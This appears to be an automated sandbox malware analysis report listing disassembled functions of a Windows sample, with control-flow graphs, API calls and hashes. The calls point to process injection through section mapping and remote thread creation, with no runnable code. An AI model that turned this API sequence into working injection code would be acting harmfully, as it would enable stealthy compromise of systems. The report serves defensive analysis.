                                                                                                                                                                                                                                  control_flow_graph 223 401549-40156e call 401193 227 401570 223->227 228 401573-401578 223->228 227->228 230 401898-4018a0 228->230 231 40157e-40158f 228->231 230->228 236 4018a5-4018b7 230->236 234 401595-4015be 231->234 235 401896 231->235 234->235 244 4015c4-4015db NtDuplicateObject 234->244 235->236 242 4018c5 236->242 243 4018bc-4018e3 call 401193 236->243 242->243 244->235 246 4015e1-401605 NtCreateSection 244->246 249 401661-401687 NtCreateSection 246->249 250 401607-401628 NtMapViewOfSection 246->250 249->235 253 40168d-401691 249->253 250->249 251 40162a-401646 NtMapViewOfSection 250->251 251->249 256 401648-40165e 251->256 253->235 254 401697-4016b8 NtMapViewOfSection 253->254 254->235 257 4016be-4016da NtMapViewOfSection 254->257 256->249 257->235 259 4016e0 call 4016e5 257->259
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                                                                                                                                                                                  • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
                                                                                                                                                                                                                                  • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
                                                                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
                                                                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000009.00000002.2598265535.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_400000_5Hyf8PuolQS_j4ZkhvHWpkWr.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Section$View$Create$DuplicateObject
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1546783058-0
                                                                                                                                                                                                                                  • Opcode ID: 2c5afbad373231fc2fe72851e77a16272d6e8026ab94bc2156a59f1271be232c
                                                                                                                                                                                                                                  • Instruction ID: 7a8a064d68380c64131d995910f5c092f0e660b32494b1024d3e535184c76cf3
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2c5afbad373231fc2fe72851e77a16272d6e8026ab94bc2156a59f1271be232c
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 78510875900249BFEF209F91CC48FAFBBB8FF86B10F144159F911AA2A5E6709940CB24
                                                                                                                                                                                                                                  Function 00401557 Relevance: 10.7, APIs: 7, Instructions: 162nativeCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 262 401557 263 40155b-40156e call 401193 262->263 264 40154f-401554 262->264 267 401570 263->267 268 401573-401578 263->268 264->263 267->268 270 401898-4018a0 268->270 271 40157e-40158f 268->271 270->268 276 4018a5-4018b7 270->276 274 401595-4015be 271->274 275 401896 271->275 274->275 284 4015c4-4015db NtDuplicateObject 274->284 275->276 282 4018c5 276->282 283 4018bc-4018e3 call 401193 276->283 282->283 284->275 286 4015e1-401605 NtCreateSection 284->286 289 401661-401687 NtCreateSection 286->289 290 401607-401628 NtMapViewOfSection 286->290 289->275 293 40168d-401691 289->293 290->289 291 40162a-401646 NtMapViewOfSection 290->291 291->289 296 401648-40165e 291->296 293->275 294 401697-4016b8 NtMapViewOfSection 293->294 294->275 297 4016be-4016da NtMapViewOfSection 294->297 296->289 297->275 299 4016e0 call 4016e5 297->299
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                                                                                                                                                                                  • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
                                                                                                                                                                                                                                  • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
                                                                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
                                                                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000009.00000002.2598265535.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_400000_5Hyf8PuolQS_j4ZkhvHWpkWr.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Section$View$Create$DuplicateObject
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1546783058-0
                                                                                                                                                                                                                                  • Opcode ID: 2a6c5c204d9128e257f6824072ce96b4ac123ccef225123859878a505f2b6fa6
                                                                                                                                                                                                                                  • Instruction ID: 25abb30e6883f9026caabbb74ebb32c420b3dbd3b7f631cb87a4d5ab1caa8f11
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2a6c5c204d9128e257f6824072ce96b4ac123ccef225123859878a505f2b6fa6
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C75118B5900209BFEF209F91CC48FAFBBB8FF85B10F144169F911BA2A5D6709940CB24
                                                                                                                                                                                                                                  Function 00402F97 Relevance: 3.2, APIs: 2, Instructions: 168nativethreadCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 302 402f97-402fbb 303 402fc1-402fd9 302->303 304 4030ee-4030f3 302->304 303->304 305 402fdf-402ff0 303->305 306 402ff2-402ffb 305->306 307 403000-40300e 306->307 307->307 308 403010-403017 307->308 309 403039-403040 308->309 310 403019-403038 308->310 311 403062-403065 309->311 312 403042-403061 309->312 310->309 313 403067-40306a 311->313 314 40306e 311->314 312->311 313->314 315 40306c 313->315 314->306 316 403070-403075 314->316 315->316 316->304 317 403077-40307a 316->317 317->304 318 40307c-4030eb RtlCreateUserThread NtTerminateProcess 317->318 318->304
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000009.00000002.2598265535.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_400000_5Hyf8PuolQS_j4ZkhvHWpkWr.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CreateProcessTerminateThreadUser
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1921587553-0
                                                                                                                                                                                                                                  • Opcode ID: 7e1873f1d77be6ac03ef9cfc7342e6364087b58188b66d07b59adfe636bbab3f
                                                                                                                                                                                                                                  • Instruction ID: 1591ba869369ea84e79847af2efd18b9bf5795e6c00b1d775a4c0b4e714efbc4
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7e1873f1d77be6ac03ef9cfc7342e6364087b58188b66d07b59adfe636bbab3f
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FD414531218E0C4FD7A8EF6CA88576277D5F798311F6643AAE809D3389EA74DC1183C5
                                                                                                                                                                                                                                  Function 028504FA Relevance: 3.0, APIs: 2, Instructions: 41processCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 319 28504fa-2850513 320 2850515-2850517 319->320 321 285051e-285052a CreateToolhelp32Snapshot 320->321 322 2850519 320->322 323 285052c-2850532 321->323 324 285053a-2850547 Module32First 321->324 322->321 323->324 331 2850534-2850538 323->331 325 2850550-2850558 324->325 326 2850549-285054a call 28501b9 324->326 329 285054f 326->329 329->325 331->320 331->324
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 02850522
                                                                                                                                                                                                                                  • Module32First.KERNEL32(00000000,00000224), ref: 02850542
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000009.00000002.2601921421.000000000283E000.00000040.00000020.00020000.00000000.sdmp, Offset: 0283E000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_283e000_5Hyf8PuolQS_j4ZkhvHWpkWr.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3833638111-0
                                                                                                                                                                                                                                  • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                                                                                                                  • Instruction ID: 926039e226a323520aeac83f46e745cb199579f872be67e9a0d918f930f3ccb9
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EFF0963D1007246FD7203FF9A88CBAE77ECAF4D769F100528EA86E10C0DB70E8458A61
                                                                                                                                                                                                                                  Function 025F003C Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 515memoryCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 0 25f003c-25f0047 1 25f004c-25f0263 call 25f0a3f call 25f0e0f call 25f0d90 VirtualAlloc 0->1 2 25f0049 0->2 17 25f028b-25f0292 1->17 18 25f0265-25f0289 call 25f0a69 1->18 2->1 20 25f02a1-25f02b0 17->20 22 25f02ce-25f03c2 VirtualProtect call 25f0cce call 25f0ce7 18->22 20->22 23 25f02b2-25f02cc 20->23 29 25f03d1-25f03e0 22->29 23->20 30 25f0439-25f04b8 VirtualFree 29->30 31 25f03e2-25f0437 call 25f0ce7 29->31 33 25f04be-25f04cd 30->33 34 25f05f4-25f05fe 30->34 31->29 36 25f04d3-25f04dd 33->36 37 25f077f-25f0789 34->37 38 25f0604-25f060d 34->38 36->34 40 25f04e3-25f0505 36->40 41 25f078b-25f07a3 37->41 42 25f07a6-25f07b0 37->42 38->37 43 25f0613-25f0637 38->43 51 25f0517-25f0520 40->51 52 25f0507-25f0515 40->52 41->42 44 25f086e-25f08be LoadLibraryA 42->44 45 25f07b6-25f07cb 42->45 46 25f063e-25f0648 43->46 50 25f08c7-25f08f9 44->50 48 25f07d2-25f07d5 45->48 46->37 49 25f064e-25f065a 46->49 53 25f07d7-25f07e0 48->53 54 25f0824-25f0833 48->54 49->37 55 25f0660-25f066a 49->55 56 25f08fb-25f0901 50->56 57 25f0902-25f091d 50->57 58 25f0526-25f0547 51->58 52->58 59 25f07e4-25f0822 53->59 60 25f07e2 53->60 62 25f0839-25f083c 54->62 61 25f067a-25f0689 55->61 56->57 63 25f054d-25f0550 58->63 59->48 60->54 64 25f068f-25f06b2 61->64 65 25f0750-25f077a 61->65 62->44 66 25f083e-25f0847 62->66 72 25f0556-25f056b 63->72 73 25f05e0-25f05ef 63->73 67 25f06ef-25f06fc 64->67 68 25f06b4-25f06ed 64->68 65->46 69 25f084b-25f086c 66->69 70 25f0849 66->70 74 25f06fe-25f0748 67->74 75 25f074b 67->75 68->67 69->62 70->44 76 25f056f-25f057a 72->76 77 25f056d 72->77 73->36 74->75 75->61 80 25f057c-25f0599 76->80 81 25f059b-25f05bb 76->81 77->73 84 25f05bd-25f05db 80->84 81->84 84->63
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 025F024D
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000009.00000002.2601604235.00000000025F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 025F0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_25f0000_5Hyf8PuolQS_j4ZkhvHWpkWr.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: AllocVirtual
                                                                                                                                                                                                                                  • String ID: cess$kernel32.dll
                                                                                                                                                                                                                                  • API String ID: 4275171209-1230238691
                                                                                                                                                                                                                                  • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                                                                                                                                                  • Instruction ID: 2bc16f8fc9d674a359e82255396bfaf4460c3dcf40cbb1e3c6c00cf5a97d9ab5
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1D525B74A01229DFDBA4CF58C984BA8BBB1BF09314F1480D9E54DAB356DB30AE85DF14
                                                                                                                                                                                                                                  Function 025F0E0F Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 332 25f0e0f-25f0e24 SetErrorMode * 2 333 25f0e2b-25f0e2c 332->333 334 25f0e26 332->334 334->333
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • SetErrorMode.KERNELBASE(00000400,?,?,025F0223,?,?), ref: 025F0E19
                                                                                                                                                                                                                                  • SetErrorMode.KERNELBASE(00000000,?,?,025F0223,?,?), ref: 025F0E1E
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000009.00000002.2601604235.00000000025F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 025F0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_25f0000_5Hyf8PuolQS_j4ZkhvHWpkWr.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ErrorMode
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2340568224-0
                                                                                                                                                                                                                                  • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                                                                                                                                  • Instruction ID: 628376f22f89637915a514a29e8cea632e2d58ee58e53dd2b420f71a9b81e576
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F2D01231545128B7D7402A94DC09BCD7F1CDF05B66F048011FB0DD9081C770954046E9
                                                                                                                                                                                                                                  Function 004018E6 Relevance: 1.3, APIs: 1, Instructions: 63sleepCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 335 4018e6-40194b call 401193 Sleep call 40141f 349 40195a-4019a5 call 401193 335->349 350 40194d-401955 call 401514 335->350 350->349
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • Sleep.KERNELBASE(00001388), ref: 00401936
                                                                                                                                                                                                                                    • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                                                                                                                                                                                    • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                                                                                                                                                                                    • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000009.00000002.2598265535.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_400000_5Hyf8PuolQS_j4ZkhvHWpkWr.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Section$CreateDuplicateObjectSleepView
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1885482327-0
                                                                                                                                                                                                                                  • Opcode ID: a4b5604c3fad4e3a9f3f792e8fb47035b06f8c3694b385928224ebe720cba1b7
                                                                                                                                                                                                                                  • Instruction ID: 08a90aa29aaa59261053d8f0d19a3ecdc4dd21bf61fce8c4d66a51d0c793aa75
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a4b5604c3fad4e3a9f3f792e8fb47035b06f8c3694b385928224ebe720cba1b7
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EB11A1F660C204FAEB106AA49C61E7A3318AB40754F304137F613790F5957D9A13F66F
                                                                                                                                                                                                                                  Function 00401915 Relevance: 1.3, APIs: 1, Instructions: 59sleepCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 364 401915-401918 365 4018c6-4018c7 364->365 366 40191a-40194b call 401193 Sleep call 40141f 364->366 367 4018d7 365->367 368 4018ce-4018e3 call 401193 365->368 378 40195a-4019a5 call 401193 366->378 379 40194d-401955 call 401514 366->379 367->368 379->378
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • Sleep.KERNELBASE(00001388), ref: 00401936
                                                                                                                                                                                                                                    • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                                                                                                                                                                                    • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                                                                                                                                                                                    • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000009.00000002.2598265535.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_400000_5Hyf8PuolQS_j4ZkhvHWpkWr.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Section$CreateDuplicateObjectSleepView
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1885482327-0
                                                                                                                                                                                                                                  • Opcode ID: 7bb1df720b8f813faa3697c6259eeb6b3a5716e5c382bc39f4698e2c5426f3b5
                                                                                                                                                                                                                                  • Instruction ID: d2c64d108ecd7190b789ce3c9d4f03e3911909dfd4099b6475a4add21270c3a3
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7bb1df720b8f813faa3697c6259eeb6b3a5716e5c382bc39f4698e2c5426f3b5
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6D019EB7208208E6DB006AA5AC51ABA33189B44359F304537F723790F6D57D8612E72F
                                                                                                                                                                                                                                  Function 004018F1 Relevance: 1.3, APIs: 1, Instructions: 55sleepCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 393 4018f1-40194b call 401193 Sleep call 40141f 403 40195a-4019a5 call 401193 393->403 404 40194d-401955 call 401514 393->404 404->403
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • Sleep.KERNELBASE(00001388), ref: 00401936
                                                                                                                                                                                                                                    • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                                                                                                                                                                                    • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                                                                                                                                                                                    • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000009.00000002.2598265535.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_400000_5Hyf8PuolQS_j4ZkhvHWpkWr.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Section$CreateDuplicateObjectSleepView
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1885482327-0
                                                                                                                                                                                                                                  • Opcode ID: db3408315eb658ba3491db04f2d46bddbd6b336d8c43cf969156009dde905ade
                                                                                                                                                                                                                                  • Instruction ID: b5ca90d31d4069b8fd1e735589466699ca1bb5e14181e618ca72d4e2f39bbf06
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: db3408315eb658ba3491db04f2d46bddbd6b336d8c43cf969156009dde905ade
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D101D2B6608204EBDB019AF49C62A7A37549F44315F200137FA53790F1D67D8643E72F
                                                                                                                                                                                                                                  Function 00401912 Relevance: 1.3, APIs: 1, Instructions: 52sleepCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 418 401912-40194b call 401193 Sleep call 40141f 429 40195a-4019a5 call 401193 418->429 430 40194d-401955 call 401514 418->430 430->429
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • Sleep.KERNELBASE(00001388), ref: 00401936
                                                                                                                                                                                                                                    • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                                                                                                                                                                                    • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                                                                                                                                                                                    • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000009.00000002.2598265535.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_400000_5Hyf8PuolQS_j4ZkhvHWpkWr.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Section$CreateDuplicateObjectSleepView
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1885482327-0
                                                                                                                                                                                                                                  • Opcode ID: 7e129187160df36b360d42079074bb08fe8934bb284168352239ee73acaefb28
                                                                                                                                                                                                                                  • Instruction ID: 0621b20c29367ada74e4c9127c9a5516285bec5e68af8f441e6b7f153e3f788d
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7e129187160df36b360d42079074bb08fe8934bb284168352239ee73acaefb28
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 11017CB560C204EAEB109AA49C61A7A3318AB44354F304537FA27790F5D67D9612E72F
                                                                                                                                                                                                                                  Function 028501B9 Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 444 28501b9-28501f3 call 28504cc 447 28501f5-2850228 VirtualAlloc call 2850246 444->447 448 2850241 444->448 450 285022d-285023f 447->450 448->448 450->448
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 0285020A
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000009.00000002.2601921421.000000000283E000.00000040.00000020.00020000.00000000.sdmp, Offset: 0283E000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_283e000_5Hyf8PuolQS_j4ZkhvHWpkWr.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: AllocVirtual
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 4275171209-0
                                                                                                                                                                                                                                  • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                                                                                                                  • Instruction ID: d1517a55b221329a8408083fff29e174c9e9d77b998bb1e1e1799bd4342d8696
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7E113C79A00208EFDB01DF98C985E99BFF5AF08350F058094F9489B361D371EA50DF81
                                                                                                                                                                                                                                  Function 00401925 Relevance: 1.3, APIs: 1, Instructions: 46sleepCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 451 401925-40194b call 401193 Sleep call 40141f 459 40195a-4019a5 call 401193 451->459 460 40194d-401955 call 401514 451->460 460->459
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • Sleep.KERNELBASE(00001388), ref: 00401936
                                                                                                                                                                                                                                    • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                                                                                                                                                                                    • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                                                                                                                                                                                    • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000009.00000002.2598265535.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_400000_5Hyf8PuolQS_j4ZkhvHWpkWr.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Section$CreateDuplicateObjectSleepView
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1885482327-0
                                                                                                                                                                                                                                  • Opcode ID: 2f4c2daa00eb47e2555f44135ed694f04ab08e7709eb0f7e86441ab925b63f7c
                                                                                                                                                                                                                                  • Instruction ID: ea6e3854d66af35421fcd7571e0742f45a6e64d38424a4e1b6315f5079e28d0a
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2f4c2daa00eb47e2555f44135ed694f04ab08e7709eb0f7e86441ab925b63f7c
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 28F08CB6208204EADB00AEA49C61EBA3318AB44314F304533FB23790F5C67D8612E72F

                                                                                                                                                                                                                                  Executed Functions

